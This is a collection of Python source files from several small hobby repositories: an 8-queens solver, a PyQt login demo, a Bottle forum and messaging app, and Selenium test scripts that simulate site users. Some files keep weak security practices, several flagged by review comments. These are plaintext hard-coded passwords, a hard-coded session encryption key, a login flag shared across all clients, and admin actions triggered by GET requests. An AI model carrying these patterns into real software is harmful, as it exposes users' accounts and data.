        return self.left() + self.right()

    def up(self):
        # Squares above the queen on its column (y-1 up to 0).
        return [(u-1, self.x) for u in range(self.y, self.min, -1)]

    def down(self):
        # Squares below the queen on its column.
        return [(d, self.x) for d in range(self.y+1, self.max)]

    def vir(self):
        # Every other square on the queen's column.
        return self.up() + self.down()

    def up_right(self):
        # Diagonal squares toward the top-right corner.
        return [(self.y-ur, self.x+ur) for ur in range(1, self.max) if self.x+ur < self.max and self.y-ur >= self.min]

    def dwon_right(self):
        # Diagonal squares toward the bottom-right corner.
        # NOTE(review): name is a typo of "down_right"; kept because
        # left_axis() (and possibly external callers) uses this spelling.
        return [(self.y+dr, self.x+dr) for dr in range(1, self.max) if self.x+dr < self.max and self.y+dr < self.max]

    def up_left(self):
        # Diagonal squares toward the top-left corner.
        return [(self.y-ul, self.x-ul) for ul in range(1, self.max) if self.x-ul >= self.min and self.y-ul >= self.min]

    def down_left(self):
        # Diagonal squares toward the bottom-left corner.
        return [(self.y+dl, self.x-dl) for dl in range(1, self.max) if self.x-dl >= self.min and self.y+dl < self.max]

    def right_axis(self):
        # The "/" diagonal through the queen.
        return self.up_right() + self.down_left()

    def left_axis(self):
        # The "\" diagonal through the queen.
        return self.up_left() + self.dwon_right()

    def all_possible_move(self):
        # Every square the queen attacks, INCLUDING its own square.
        return [(self.y, self.x)] + self.hor() + self.vir() + self.right_axis() + self.left_axis()
| {"/main.py": ["/queen.py"]} |
78,224 | Me-TheKing/8Queen | refs/heads/main | /main.py | from queen import Queen
# Current partial solution: list of (row, col) queen placements.
board_set = []
# Board dimensions; a complete solution places BOARD_SIZE queens.
ROW = COL = BOARD_SIZE = 4
# set_num counts solutions; y_row/x_col are the search resume point.
# NOTE(review): next_col_x appears unused.
set_num = next_col_x = y_row = x_col = 0
break_loop = False
def check_cell(y, x, board_set_lst):
    """True when square (y, x) is not attacked by any placed queen."""
    attacked = Queen(y, x, BOARD_SIZE).all_possible_move()
    return not any(cell in board_set_lst for cell in attacked)
def pop_last_set(board):
    """Drop the most recent placement; return (its row, the next column to try)."""
    row, col = board.pop()
    return row, col + 1
# Depth-first search over queen placements. `board_set` holds the current
# partial solution; backtracking pops the last queen and resumes the scan at
# the next column of that row.
while True:
    if y_row < ROW and x_col < COL:
        for y in range(y_row, ROW):
            for x in range(x_col, COL):
                if check_cell(y, x, board_set):
                    board_set.append((y, x))
                    y_row, x_col = y, x
                    break  # break X range
                elif x == COL - 1:
                    # Bug fix: the original referenced the undefined name
                    # `col` (NameError); the constant is COL. The redundant
                    # second check_cell() call (already known False on this
                    # branch) is dropped too.
                    y_row, x_col = pop_last_set(board_set)
                    break_loop = True
                    break  # break X range
            if break_loop:
                break_loop = False
                break  # break Y range
            x_col = 0  # reset the start of the loop by zero
    if len(board_set) == BOARD_SIZE:
        set_num += 1
        print(f'ok set {set_num} = {board_set}')
        # continue the search: remove the last placement, try the next cell
        y_row, x_col = pop_last_set(board_set)
    elif board_set:
        y_row, x_col = pop_last_set(board_set)
    elif not board_set:
        break  # search space exhausted: stop the while loop
| {"/main.py": ["/queen.py"]} |
78,227 | dekapaan/PyQt-exception-handling | refs/heads/main | /main.py | from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import QtCore
import sys
import qtawesome as qta
class UI(QWidget):
    """Frameless login window; validates against a hard-coded credential map."""

    def __init__(self):
        super().__init__()
        self.setFixedWidth(600)
        self.setFixedHeight(300)
        # Frameless window: the mouse handlers below implement dragging.
        self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
        self.setStyleSheet(
            """
            * {background: #222;}
            QLineEdit {
                background: white;
                color: #222;
                border-radius: 2px;
                width: 300px;
                height: 30px;
            }
            """
        )
        self.icon_exit = qta.icon('mdi.close', color='white', scale_factor=2)
        self.btn_exit = QPushButton(self.icon_exit, '', self)
        self.btn_exit.setCursor(QtCore.Qt.PointingHandCursor)
        # NOTE(review): wired to the builtin exit(); consider self.close().
        self.btn_exit.clicked.connect(exit)
        self.btn_exit.setStyleSheet("background: #222;" + "border: none;" + "color: white;")
        self.btn_exit.move(560, 20)
        self.title = QLabel('Authentication', self)
        self.title.setStyleSheet("background: #222;" + "color: white;")
        self.title.move(25, 20)
        self.entry_username = QLineEdit(self)
        self.entry_username.setPlaceholderText("Enter username")
        self.entry_username.setStyleSheet(
            """
            background: white;
            color: #222;
            """)
        self.entry_username.move(160, 97)
        self.entry_password = QLineEdit(self)
        self.entry_password.setPlaceholderText("Enter password")
        self.entry_password.move(160, 150)
        self.btn_login = QPushButton('Login', self)
        self.btn_login.clicked.connect(self.login)
        self.btn_login.setStyleSheet(
            """
            * {
                background: #222;
                color: #ff007f;
                border: 1px solid #ff007f;
                padding: 10px 50px;
                border-radius: 2px;
            }
            :hover {
                background: #ff007f;
                color: #222;
            }
            """)
        self.btn_login.move(244, 200)
        # Hard-coded credential store: username -> password.
        # NOTE(review): plaintext passwords in source — demo use only.
        self.dict_user_pass = {"Zoe": "wavywave99", "Adam": "bighead64", "dekapaan": "dayon"}
        self.old_pos = self.pos()
        self.show()

    def mousePressEvent(self, event):
        # Remember where a drag starts (no native title bar to grab).
        self.old_pos = event.globalPos()

    def mouseMoveEvent(self, event):
        # Translate the window by the mouse delta to emulate title-bar dragging.
        moved = QtCore.QPoint(event.globalPos() - self.old_pos)
        self.move(self.x() + moved.x(), self.y() + moved.y())
        self.old_pos = event.globalPos()

    def login(self):
        """Validate the entered credentials; on success open the next window."""
        try:
            user = self.entry_username.text()
            password = self.entry_password.text()
            if user in self.dict_user_pass:
                if password == self.dict_user_pass[user]:
                    # Importing this module builds and shows its UI at import
                    # time. NOTE(review): it also constructs its own
                    # QApplication while this one is running, and destroy()
                    # is unusual for QWidget — verify close() isn't intended.
                    import exception_handling
                    root.destroy()
                else:
                    raise ValueError
            else:
                raise KeyError
        except ValueError:
            msg_box = QMessageBox()
            msg_box.setText("Incorrect password")
            msg_box.setIcon(QMessageBox.Critical)
            msg_box.setWindowTitle("Error")
            msg_box.exec()
        except KeyError:
            msg_box = QMessageBox()
            msg_box.setText("Username doesn't exist")
            msg_box.setIcon(QMessageBox.Critical)
            msg_box.setWindowTitle("Error")
            msg_box.exec()
# Entry point: build the Qt application, show the login window, run the loop.
app = QApplication(sys.argv)
root = UI()
app.exec()
| {"/main.py": ["/exception_handling.py"]} |
78,228 | dekapaan/PyQt-exception-handling | refs/heads/main | /exception_handling.py | from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import QtCore
import sys
import qtawesome as qta
class ExceptionHandling(QWidget):
    """Frameless demo window: validates an amount and reports via message boxes."""

    def __init__(self):
        super().__init__()
        self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
        self.setFixedWidth(400)
        self.setFixedHeight(200)
        self.setStyleSheet(
            """
            * {background: #222;}
            QLineEdit {
                background: white;
                color: #222;
                border-radius: 2px;
                width: 300px;
                height: 30px;
            }
            """
        )
        self.title = QLabel('Exception handling', self)
        self.title.setStyleSheet("background: #222;" + "color: white;")
        self.title.move(12, 11)
        self.icon_exit = qta.icon('mdi.close', color='white', scale_factor=2)
        self.btn_exit = QPushButton(self.icon_exit, '', self)
        self.btn_exit.setCursor(QtCore.Qt.PointingHandCursor)
        # NOTE(review): wired to the builtin exit(); consider self.close().
        self.btn_exit.clicked.connect(exit)
        self.btn_exit.setStyleSheet("background: #222;" + "border: none;" + "color: white;")
        self.btn_exit.move(370, 12)
        self.entry_amount = QLineEdit(self)
        self.entry_amount.setPlaceholderText("Enter amount in your account")
        self.entry_amount.move(50, 70)
        self.btn_login = QPushButton('Check Qualification', self)
        self.btn_login.clicked.connect(self.check)
        self.btn_login.setStyleSheet(
            """
            * {
                background: #222;
                color: #ff007f;
                border: 1px solid #ff007f;
                padding: 10px 30px;
                border-radius: 2px;
            }
            :hover {
                background: #ff007f;
                color: #222;
            }
            """)
        self.btn_login.move(100, 120)
        self.show()
        self.old_pos = self.pos()

    def mousePressEvent(self, event):
        # Remember where a drag starts (no native title bar to grab).
        self.old_pos = event.globalPos()

    def mouseMoveEvent(self, event):
        # Move the window by the mouse delta to emulate title-bar dragging.
        moved = QtCore.QPoint(event.globalPos() - self.old_pos)
        self.move(self.x() + moved.x(), self.y() + moved.y())
        self.old_pos = event.globalPos()

    def check(self):
        """Parse the entered amount and report qualification via QMessageBox."""
        try:
            amount = int(self.entry_amount.text())
            if amount < 0:
                # Negative amounts are treated the same as unparseable input.
                raise ValueError
            if amount < 3000:
                msg_box = QMessageBox()
                msg_box.setText("Insufficient Amount")
                msg_box.setIcon(QMessageBox.Critical)
                msg_box.setWindowTitle("Warning")
                msg_box.exec()
            elif amount >= 3000:
                msg_box = QMessageBox()
                msg_box.setText("Congratulations. You qualify to go to Malaysia")
                msg_box.setIcon(QMessageBox.Information)
                msg_box.setWindowTitle("Good News")
                msg_box.exec()
        except ValueError:
            msg_box = QMessageBox()
            msg_box.setText("Invalid amount")
            msg_box.setIcon(QMessageBox.Warning)
            msg_box.setWindowTitle("Error")
            msg_box.exec()
# Built at import time (the login window imports this module on success).
# NOTE(review): creates a second QApplication and never calls exec() here —
# apparently relies on the importer's event loop; confirm this is intended.
app = QApplication(sys.argv)
root = ExceptionHandling()
78,229 | jeffrey-lai20/Virtual-Users | refs/heads/master | /controller.py | '''
This file will handle our typical Bottle requests and responses
You should not have anything beyond basic page loads, handling forms and
maybe some simple program logic
'''
from bottle import route, get, post, request, static_file, error, Bottle, template, redirect, delete
import os
import argparse
import model
import bottle
import sqlite3
# Crude session flag: 1 after the login page is visited, 0 after logout.
# NOTE(review): one module-global flag is shared by every client — verify the
# real per-user session handling lives in model/aaa. (`global` is a no-op at
# module scope; kept as-is.)
global login
login = 0
#-----------------------------------------------------------------------------
# Static file paths
#-----------------------------------------------------------------------------
# Allow image loading
@route('/img/<picture:path>')
def serve_pictures(picture):
    '''
    serve_pictures
    Serves images from static/img/
    :: picture :: A path to the requested picture
    Returns a static file object containing the requested picture
    '''
    return static_file(picture, root='static/img/')

#-----------------------------------------------------------------------------
# Allow CSS
@route('/css/<css:path>')
def serve_css(css):
    '''
    serve_css
    Serves css from static/css/
    :: css :: A path to the requested css
    Returns a static file object containing the requested css
    '''
    return static_file(css, root='static/css/')

#-----------------------------------------------------------------------------
# Allow javascript
@route('/js/<js:path>')
def serve_js(js):
    '''
    serve_js
    Serves js from static/js/
    :: js :: A path to the requested javascript
    Returns a static file object containing the requested javascript
    '''
    return static_file(js, root='static/js/')
#-----------------------------------------------------------------------------
# Pages
#-----------------------------------------------------------------------------
# Redirect to login
@get('/')
@get('/home')
def get_index():
    '''
    get_index
    Serves the index page; the module-level `login` flag tells the template
    whether a session is active.
    '''
    global login
    return model.index(login)

#-----------------------------------------------------------------------------
# Display the login page
@get('/login')
def get_login_controller():
    '''
    get_login
    Serves the login page and sets the module-level session flag.
    '''
    global login
    login = 1
    return model.login_form()

#-----------------------------------------------------------------------------
# Attempt the login
@post('/login')
def post_login():
    '''
    post_login
    Handles login attempts.
    Expects a form containing 'username' and 'password' fields.
    '''
    # Handle the form processing
    username = request.forms.get('username')
    password = request.forms.get('password')
    # Delegate credential checking to the model layer.
    return model.login_check(username, password)

# -----------------------------------------------------------------------------
# Display the register page
@get('/register')
def get_register_controller():
    '''
    get_register
    Serves the register page.
    '''
    return model.register_form()

# -----------------------------------------------------------------------------
# Attempt the register
@post('/register')
def post_register():
    '''
    post_register
    Handles register attempts.
    Expects 'username', 'password' and 'confirm_password' form fields.
    '''
    # Handle the form processing
    username = request.forms.get('username')
    password = request.forms.get('password')
    confirm_password = request.forms.get('confirm_password')
    return model.register_post(username, password, confirm_password)

# -----------------------------------------------------------------------------
# Logout
@get('/logout')
def get_logout_controller():
    '''
    get_logout
    Clears the module-level session flag and serves the logout page.
    '''
    global login
    login = 0
    return model.logout()
#-----------------------------------------------------------------------------
@get('/about')
def get_about():
    '''Serves the about page.'''
    return model.about()

#-----------------------------------------------------------------------------
@get('/invalid')
def get_invalid():
    '''Serves the invalid page; the `reason` query parameter explains why.'''
    reason = request.query['reason']
    return model.invalid(reason)

#-----------------------------------------------------------------------------
@get('/dashboard')
def get_dashboard():
    '''Serves the dashboard page.'''
    return model.dashboard()

#-----------------------------------------------------------------------------
@error(404)
def error404(error):
    # Custom 404 page rendered by the model layer.
    return model.error404()
#-----------------------------------------------------------------------------
#list all Threads
@get('/forum')
def get_forum(thread_name = None):
    # Require an authenticated session, then list every thread newest-first.
    model.aaa.require(fail_redirect='/login')
    conn = sqlite3.connect('forum.db')
    c = conn.cursor()
    threads = []
    cursor = c.execute("SELECT name, role, topic, reply, content, id, reply_id from FORUM")
    for row in cursor:
        threads.append(row)
    threads.reverse()
    conn.close()
    # `muted` lets the template hide posting controls for muted users.
    return model.template("templates/forum.html", threads = threads, thread_name = thread_name, **model.current_user_data(), muted = model.all_user_data()['users'][model.current_user_data()['username']]['muted'])
@get('/forum/new')
def forum_new(thread_name = None):
    # Render the "create thread" form with the current thread list alongside.
    model.aaa.require(fail_redirect='/login')
    conn = sqlite3.connect('forum.db')
    c = conn.cursor()
    threads = []
    cursor = c.execute("SELECT name, role, topic, reply, content, id, reply_id from FORUM")
    for row in cursor:
        threads.append(row)
    threads.reverse()
    conn.close()
    return model.template("templates/forum_new.html", threads = threads, thread_name = thread_name, muted = model.all_user_data()['users'][model.current_user_data()['username']]['muted'])
@post('/forum/new')
def receive_forum_new(thread_name = None):
    """Create a new forum thread from the submitted form.

    Security fix: user-supplied topic/content were concatenated straight into
    the SQL string (SQL injection); use sqlite3 parameter binding instead.
    """
    model.aaa.require(fail_redirect='/login')
    thread_name = request.forms.get('topic')
    content = request.forms.get('content')
    conn = sqlite3.connect('forum.db')
    try:
        c = conn.cursor()
        c.execute(
            "INSERT INTO FORUM (name, role, topic, reply, content) "
            "VALUES (?, ?, ?, ?, ?)",
            (model.aaa.current_user.username, model.aaa.current_user.role,
             thread_name, 'no', content))
        conn.commit()
    finally:
        # Always release the connection, even if the INSERT fails.
        conn.close()
    return get_forum()
@get('/forum/read/<thread_name>')
def get_forum_by_name(thread_name):
    # Show the forum with one thread expanded.
    model.aaa.require(fail_redirect='/login')
    return get_forum(thread_name)
@post('/forum/read/<thread_name>')
def get_reply(thread_name):
    """Store a reply posted to *thread_name*.

    Security fix: the reply text and user fields were concatenated into the
    SQL string (SQL injection); use sqlite3 parameter binding instead.
    """
    model.aaa.require(fail_redirect='/login')
    reply = request.forms.get('reply')
    conn = sqlite3.connect('forum.db')
    try:
        c = conn.cursor()
        c.execute(
            "INSERT INTO FORUM (name, role, topic, reply, content, id) "
            "VALUES (?, ?, ?, ?, ?, ?)",
            (model.aaa.current_user.username, model.aaa.current_user.role,
             "reply", 'yes', reply, thread_name))
        conn.commit()
    finally:
        conn.close()
    return get_forum(thread_name)
@get('/forum/delete/<info>')
def get_delete(info):
    """Delete a reply ('<reply_id>_y_<thread>') or a whole thread ('<id>_n_...').

    Security fix: the path segment was concatenated into the SQL string
    (SQL injection); use parameter binding. Also closes the connection on
    every path (the original leaked it when neither marker matched) and drops
    an unused `reply` form read.
    """
    model.aaa.require(fail_redirect='/login')
    conn = sqlite3.connect('forum.db')
    try:
        c = conn.cursor()
        if len(info.split('_y_')) == 2:
            reply_id, thread = info.split('_y_')
            c.execute("DELETE FROM FORUM WHERE reply_id = ?", (reply_id,))
            conn.commit()
            return get_forum(thread)
        elif len(info.split('_n_')) == 2:
            thread_id = info.split('_n_')[0]
            c.execute("DELETE FROM FORUM WHERE id = ?", (thread_id,))
            conn.commit()
            return get_forum(None)
    finally:
        conn.close()
@get('/profile')
def profile():
    # Current user's profile page.
    return model.profile()

@get('/manage_user')
def manage_user():
    # Admin/staff user-management page.
    return model.manage_user()
@get('/delete/<user_name>')
def delete_user(user_name):
    # Staff/admin only: remove an account from the user store.
    model.aaa.require(fail_redirect='/login')
    if model.aaa.current_user.role=='user':
        return model.error404()
    del model.all_user_data()['users'][user_name]
    return bottle.redirect('/manage_user')

@get('/promote/<user_name>')
def promote(user_name):
    # Staff/admin only: raise a user's role to 'staff'.
    model.aaa.require(fail_redirect='/login')
    if model.aaa.current_user.role=='user':
        return model.error404()
    model.all_user_data()['users'][user_name]['role'] = 'staff'
    return bottle.redirect('/manage_user')

@get('/profile/reset_password')
def reset_password():
    # NOTE(review): unimplemented stub; a second `reset_password` defined
    # later in this module shadows this name (both routes stay registered,
    # since binding happens at decoration time).
    model.aaa.require(fail_redirect='/login')
    return

@get('/mute/<user>')
def mute_user(user):
    # Staff/admin only: block a user from posting.
    model.aaa.require(fail_redirect='/login')
    if model.aaa.current_user.role=='user':
        return model.error404()
    model.all_user_data()['users'][user]['muted'] = 1
    return bottle.redirect('/manage_user')

@get('/unmute/<user>')
def unmute_user(user):
    # Staff/admin only: allow a muted user to post again.
    model.aaa.require(fail_redirect='/login')
    if model.aaa.current_user.role=='user':
        return model.error404()
    model.all_user_data()['users'][user]['muted'] = 0
    return bottle.redirect('/manage_user')
##########################################################################################
@get('/message')
def message(db):
    # `db` is injected by the bottle-sqlite plugin installed in run.py.
    return model.message(db)

@post('/message')
def message_post(db):
    return model.message_post(db)

@delete('/message/<message_id:int>')
def message_delete(message_id, db):
    return model.message_delete(message_id, db)

@post('/message_reply')
def message_reply(db):
    return model.message_reply_post(db)

@get('/reset_password')
def reset_password():
    # Serves the password-change form (shadows the earlier stub of the
    # same name; both routes remain registered).
    return model.reset_password()

@post('/reset_password')
def reset_password_post():
    # Collect the password-change form and delegate validation to the model.
    old_password = request.forms.get('old_password')
    new_password = request.forms.get('new_password')
    confirm_password = request.forms.get('confirm_password')
    return model.reset_password_post(old_password, new_password, confirm_password)
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,230 | jeffrey-lai20/Virtual-Users | refs/heads/master | /run.py | '''
This is a file that configures how your server runs
You may eventually wish to have your own explicit config file
that this reads from.
For now this should be sufficient.
Keep it clean and keep it simple, you're going to have
Up to 5 people running around breaking this constantly
If it's all in one file, then things are going to be hard to fix
If in doubt, `import this`
'''
#-----------------------------------------------------------------------------
import sys
from bottle import get, post, request, static_file, error, Bottle, template,ServerAdapter, route, run, server_names
import bottle.ext.sqlite
import model
import argparse
import bottle
from beaker.middleware import SessionMiddleware
import os
from cheroot import wsgi
from cheroot.ssl.builtin import BuiltinSSLAdapter
import ssl
import crypt
import pwd
#-----------------------------------------------------------------------------
# You may eventually wish to put these in their own directories and then load
# Each file separately
# For the template, we will keep them together
import model
import view
import controller
#-----------------------------------------------------------------------------
# import configurations
configs = {}
try:
import configs
configs = configs.configs
default_configs = False
except ImportError:
default_configs = True
pass
# It might be a good idea to move the following settings to a config file and then load them
# Change this to your IP address or 0.0.0.0 when actually hosting
host = '0.0.0.0' if default_configs else configs["web"]["host"]
# Test port, change to the appropriate port to host
port = 8080 if default_configs else configs["web"]["port"]
# Turn this off for production
debug = True
# Turn this off for production
fast = False if default_configs else configs["app"]["fast"]
################################################################################################################
#Resource part
@get('/resource')
def do_index():
    """List all uploaded files"""
    model.aaa.require(fail_redirect='/login')
    root = '%s/' % bottle.request.environ.get('SCRIPT_NAME')
    return bottle.template('templates/resource.html', files=os.listdir(request.app.config['file_upload.dir']), root=root, **model.current_user_data())
    #return model.page_view('resource', page_title="Resource", files=os.listdir(request.app.config['file_upload.dir']), root=root)

@get('/resource/download/<filename>')
def do_download(filename):
    model.aaa.require(fail_redirect='/login')
    # static_file() resolves the name against `root` and itself rejects
    # path traversal, unlike a raw os.path join.
    """Return a static file from the files directory"""
    return bottle.static_file(filename, root=request.app.config['file_upload.dir'])

@post('/resource/upload')
def do_upload():
    model.aaa.require(fail_redirect='/login')
    """Upload a file if it's missing"""
    upload = bottle.request.files.get('upload')  # pylint: disable-msg=E1101
    try:
        upload.save(request.app.config['file_upload.dir'])
    except IOError as io_error:
        # save() refuses to overwrite an existing file -> report a conflict.
        return bottle.HTTPError(409, io_error)
    root = '%s/' % bottle.request.environ.get('SCRIPT_NAME')
    bottle.redirect('/resource')
@get('/resource/delete/<filename>')
def do_delete(filename):
    """Delete an uploaded file; staff/admin only.

    Security fix: the raw path segment was joined as "files/<filename>",
    allowing '../' traversal to delete files outside the upload directory.
    Strip any directory components before deleting.
    """
    model.aaa.require(fail_redirect='/login')
    if model.aaa.current_user.role == "user":
        return
    safe_name = os.path.basename(filename)
    os.remove(os.path.join("files", safe_name))
    bottle.redirect('/resource')
def create_files_dir(path):
    """Ensure the upload directory *path* exists (no-op when already present)."""
    if os.path.isdir(path):
        return
    os.mkdir(path)
################################################################################################################
app = bottle.app()

class SSLCherryPyServer(ServerAdapter):
    # Bottle server adapter that serves HTTPS via cheroot, with TLSv1 and
    # TLSv1.1 explicitly disabled (so TLS >= 1.2 only).
    def run(self, handler):
        server = wsgi.Server((self.host, self.port), handler)
        # Certificate/key pair is expected next to this file.
        server.ssl_adapter = BuiltinSSLAdapter("ca.crt", "ca.key")
        server.ssl_adapter.context.options |= ssl.OP_NO_TLSv1
        server.ssl_adapter.context.options |= ssl.OP_NO_TLSv1_1
        try:
            server.start()
        finally:
            server.stop()
def run_server():
    '''
    run_server
    Configures the bottle app (sqlite plugin, cookie sessions, upload dir)
    and serves it over HTTPS via SSLCherryPyServer.
    '''
    # add bottle-sqlite plugin: link routes taking a `db` arg to sqlite3
    plugin=bottle.ext.sqlite.Plugin(dbfile='./database/info2222.db')
    app.install(plugin)
    session_opts = {
        'session.cookie_expires': True,
        # NOTE(review): hard-coded session key checked into source — replace
        # with a real secret before deployment.
        'session.encrypt_key': 'please use a random key and keep it secret!',
        'session.httponly': True,
        'session.timeout': 3600 * 24,  # 1 day
        'session.type': 'cookie',
        'session.validate_key': True,
    }
    ################################################################################################################
    # Change working directory so relative paths (and template lookup) work
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    app.config.setdefault('file_upload.dir', 'files')
    if os.path.exists('file_upload.conf'):
        app.config.load_config('file_upload.conf')
    create_files_dir(app.config['file_upload.dir'])
    ################################################################################################################
    # Wrap with beaker's cookie-session middleware, then serve over TLS.
    appp = SessionMiddleware(app, session_opts)
    run(app=appp, host=host, port=port, server=SSLCherryPyServer, fast=fast)
#-----------------------------------------------------------------------------
# Optional SQL support
# Comment out the current manage_db function, and
# uncomment the following one to load an SQLite3 database
def manage_db():
    """Database-management hook; currently a no-op placeholder."""
    return None
"""
import sql
def manage_db():
'''
manage_db
Starts up and re-initialises an SQL databse for the server
'''
database_args = ":memory:" # Currently runs in RAM, might want to change this to a file if you use it
sql_db = sql.SQLDatabase(database_args=database_args)
return
"""
#-----------------------------------------------------------------------------
# What commands can be run with this python file
# Add your own here as you see fit
command_list = {
'manage_db' : manage_db,
'server' : run_server
}
# The default command if none other is given
default_command = 'server'
def run_commands(args):
    """
    Interpret command line arguments as command names and execute each one.

    :: args :: argv-style list; args[0] (the program name) is ignored.

    Unknown command names are reported but do not abort the remaining ones.
    When no command is given, the module-level default_command is run.
    """
    requested = args[1:] or [default_command]
    for name in requested:
        handler = command_list.get(name)
        if handler is not None:
            handler()
        else:
            print("Command '{command}' not found".format(command=name))
#-----------------------------------------------------------------------------
def app_instance():
    """
    Build and return the WSGI application wrapped with session middleware.

    Mirrors the setup performed by run_server for direct serving: installs
    the SQLite plugin, configures cookie-based sessions and the file-upload
    directory, then wraps the Bottle app for use by an external WSGI host.
    """
    sqlite_plugin = bottle.ext.sqlite.Plugin(dbfile='./database/info2222.db')
    app.install(sqlite_plugin)
    session_config = {
        'session.cookie_expires': True,
        'session.encrypt_key': 'please use a random key and keep it secret!',
        'session.httponly': True,
        'session.timeout': 3600 * 24,  # 1 day
        'session.type': 'cookie',
        'session.validate_key': True,
    }
    # Make relative paths (templates, upload dir, config) resolve from this
    # file's directory regardless of where the host process was started.
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    app.config.setdefault('file_upload.dir', 'files')
    if os.path.exists('file_upload.conf'):
        app.config.load_config('file_upload.conf')
    create_files_dir(app.config['file_upload.dir'])
    return SessionMiddleware(app, session_config)
#-----------------------------------------------------------------------------
# Entry point: run CLI commands when executed directly; otherwise (e.g. when
# imported by a WSGI server) expose the session-wrapped application as `app`.
if __name__ == '__main__':
    run_commands(sys.argv)
else:
    app = app_instance();
78,231 | jeffrey-lai20/Virtual-Users | refs/heads/master | /virtual_users/virtual_user8.py | import requests
import time
import getpass
import selenium
import time
import sys
import csv
import getpass
from selenium import webdriver
default_target = "https://0.0.0.0:8080/invalid?reason=User%20is%20already%20existing.."
def scrape(target):
    """Register a fixed test account through the site UI, then visit *target*.

    Drives a local Firefox instance through the home and register pages,
    submits the registration form for the hard-coded user "test2", and
    finally loads *target* before closing the browser.
    """
    driver = webdriver.Firefox()

    def fill(field_name, value):
        # Locate a form input by its name attribute, wipe it, type the value.
        field = driver.find_element_by_name(field_name)
        field.clear()
        field.send_keys(value)

    print("Going to home page")
    driver.get("https://0.0.0.0:8080/")
    time.sleep(1)
    print("Going to register page")
    driver.get("https://0.0.0.0:8080/register")
    username = "test2"
    password = "test2"
    print("Registering!")
    fill("username", username)
    fill("password", password)
    fill("confirm_password", password)
    time.sleep(1)
    # Submit the registration form.
    driver.find_element_by_name("registerButton").click()
    print("Registered!")
    time.sleep(1)
    driver.get(target)
    print("Arrived at target")
    time.sleep(1)
    print("Finished, closing web driver.")
    driver.close()
if __name__ == '__main__':
    # Take the target URL from the command line when supplied.
    target_url = default_target if len(sys.argv) == 1 else sys.argv[1]
    scrape(target_url)
    print("Finished!")
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,232 | jeffrey-lai20/Virtual-Users | refs/heads/master | /random_virtual.py | import os
from random import randint
# Pick one of the 15 virtual-user scripts at random and launch it.
number = randint(1, 15)
script = 'virtual_users/virtual_user' + str(number) + '.py'
os.system('python3 ' + script)
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,233 | jeffrey-lai20/Virtual-Users | refs/heads/master | /virtual_users/virtual_user13.py | import requests
import time
import getpass
import selenium
import time
import sys
import csv
import getpass
from selenium import webdriver
default_target = "https://0.0.0.0:8080/message"
def scrape(target):
    """Exercise the private-message flow end to end, then visit *target*.

    Logs in as "test2", sends a message to "test3", logs out, logs back in
    as "test3", replies to that message, deletes it, and finally loads
    *target* before closing the browser.

    NOTE(review): credentials, URLs and the 1-4s sleeps are hard-coded test
    fixtures; the script assumes users "test2" and "test3" already exist on
    the server — confirm against the registration scripts.
    """
    driver = webdriver.Firefox()
    # --- log in as the sender ("test2") ---
    print("Going to home page")
    driver.get("https://0.0.0.0:8080/")
    time.sleep(1)
    print("Going to login page")
    driver.get("https://0.0.0.0:8080/login")
    username = "test2"
    password = "test2"
    print("Logging in")
    # Enter username
    username_field = driver.find_element_by_name("username")
    username_field.clear()
    username_field.send_keys(username)
    # Enter password
    password_field = driver.find_element_by_name("password")
    password_field.clear()
    password_field.send_keys(password)
    time.sleep(1)
    # Hit the button
    login_button = driver.find_element_by_name("loginButton")
    login_button.click()
    print("Logged in!")
    time.sleep(1)
    # --- compose and send a new message to "test3" ---
    message_button = driver.find_element_by_name("messageButton")
    message_button.click()
    time.sleep(1)
    driver.find_element_by_id("new_message_btn").click();
    time.sleep(1)
    print("Writing message")
    to_field = driver.find_element_by_name("to_user")
    to_field.clear()
    to_field.send_keys("test3")
    subject_field = driver.find_element_by_name("subject")
    subject_field.clear()
    subject_field.send_keys("Virtual")
    body_field = driver.find_element_by_name("body")
    body_field.clear()
    body_field.send_keys("User message")
    reply_button = driver.find_element_by_name("sendMessage")
    reply_button.click()
    time.sleep(1)
    # --- switch to the recipient account ("test3") ---
    driver.get("https://0.0.0.0:8080/logout")
    time.sleep(1)
    print("Going to login page")
    driver.get("https://0.0.0.0:8080/login")
    username = "test3"
    password = "test3"
    print("Logging in")
    # Enter username
    username_field = driver.find_element_by_name("username")
    username_field.clear()
    username_field.send_keys(username)
    # Enter password
    password_field = driver.find_element_by_name("password")
    password_field.clear()
    password_field.send_keys(password)
    time.sleep(1)
    # Hit the button
    login_button = driver.find_element_by_name("loginButton")
    login_button.click()
    print("Logged in!")
    time.sleep(1)
    # --- open the message (found by its subject link), reply, then delete ---
    message_button = driver.find_element_by_name("messageButton")
    message_button.click()
    time.sleep(1)
    link1 = driver.find_element_by_link_text("Virtual")
    link1.click()
    time.sleep(1)
    replay_field = driver.find_element_by_name("replay")
    replay_field.clear()
    replay_field.send_keys("This is a reply")
    time.sleep(1)
    link2 = driver.find_element_by_name("submitButton")
    link2.click()
    time.sleep(4)
    link3 = driver.find_element_by_link_text("Virtual")
    link3.click()
    time.sleep(1)
    link4 = driver.find_element_by_link_text("Delete")
    link4.click()
    time.sleep(1)
    # --- finish by visiting the requested target page ---
    driver.get(target)
    print("Arrived at target")
    time.sleep(1)
    print("Finished, closing web driver.")
    driver.close()
if __name__ == '__main__':
    # Take the target URL from the command line when supplied.
    target_url = default_target if len(sys.argv) == 1 else sys.argv[1]
    scrape(target_url)
    print("Finished!")
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,234 | jeffrey-lai20/Virtual-Users | refs/heads/master | /database/create_db.py | import sqlite3
def create_connection(db_file):
    """Open a connection to the SQLite database held in *db_file*.

    :param db_file: path of the database file (":memory:" also works)
    :return: sqlite3.Connection on success, None when opening fails
    """
    try:
        connection = sqlite3.connect(db_file)
    except sqlite3.Error as err:
        # Report the failure instead of raising; callers test for None.
        print(err)
        return None
    print("Opened database successfully")
    return connection
def create_table(conn, create_table_sql):
    """Execute a CREATE TABLE statement, printing (not raising) any error.

    :param conn: open sqlite3 Connection object
    :param create_table_sql: full CREATE TABLE statement to run
    """
    try:
